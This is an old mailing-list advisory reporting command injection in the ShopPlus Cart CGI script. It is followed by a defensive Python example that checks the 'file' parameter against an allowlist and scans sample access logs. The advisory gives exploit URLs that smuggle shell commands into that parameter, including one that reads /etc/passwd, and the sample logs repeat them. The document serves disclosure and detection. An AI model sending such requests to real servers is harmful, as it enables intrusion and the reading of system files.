From: Kernel|X| (securepunkass.com)
Date: Wed Sep 05 2001 - 14:06:56 CDT


                        ------------[ advisory ]------------
    name: ShopPlus Cart

    Bug Information:
    The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
    Because of its flexibility, it allows you to sell virtually any product or services and
    fully customize the shopping experience of your web site.
    http://www.ksofttech.com/help/shopplus/

    Problem:
    The script doesn't check symbols. Any user can execute commands on the web server.

    Exploit:
    host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
    host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|

    Bug found by Kernel|X| and aLph4Num3ric
    E-Mail:
    securepunkass.com [kernel|x|]
    alph4num3riccrackdealer.com [aLph4Num3ric]
    WWW: www.russiahack.com / www.tmgroup.sh

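A defender's view of the requests above, as an added example that is not part of the original advisory or of the ShopPlus code: a strict allowlist for the `file` parameter and a scan of web-server access logs for `shopplus.cgi` requests that violate it. The log lines are constructed, and the allowlist pattern (plain file names only) and the function names are assumptions about what legitimate values look like.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate `file` value is a plain name such as "index.html".
# Anything else (shell metacharacters, slashes, empty values) is rejected.
SAFE_FILE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (common log format), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Sep/2001:14:00:01 -0500] "GET /scripts/shopplus.cgi'
    '?dn=example.com&cartid=1001&file=index.html HTTP/1.0" 200 5120',
    '192.0.2.77 - - [05/Sep/2001:14:02:13 -0500] "GET /scripts/shopplus.cgi'
    '?dn=example.com&cartid=1002&file=;cat%20/etc/passwd| HTTP/1.0" 200 812',
    '192.0.2.78 - - [05/Sep/2001:14:03:40 -0500] "GET /scripts/shopplus.cgi'
    '?dn=example.com&cartid=1003&file=%3Buid%7C HTTP/1.0" 200 64',
    '192.0.2.11 - - [05/Sep/2001:14:04:02 -0500] "GET /index.html HTTP/1.0" 200 2048',
]

def is_safe_file_param(value):
    """Allowlist check to apply to the decoded value before it reaches the file system."""
    return SAFE_FILE.fullmatch(value) is not None

def suspicious_requests(lines, script="shopplus.cgi"):
    """Return (client, decoded file value) for script requests failing the allowlist."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue
        # Split on '&' only, so a ';' inside a value is never treated as a separator.
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            if name == "file":
                value = unquote_plus(raw)  # decode %3B, %7C, %20 before checking
                if not is_safe_file_param(value):
                    hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent file={value!r}")
```

The same allowlist belongs in the script itself, applied to the decoded `file` value before it is used to open anything.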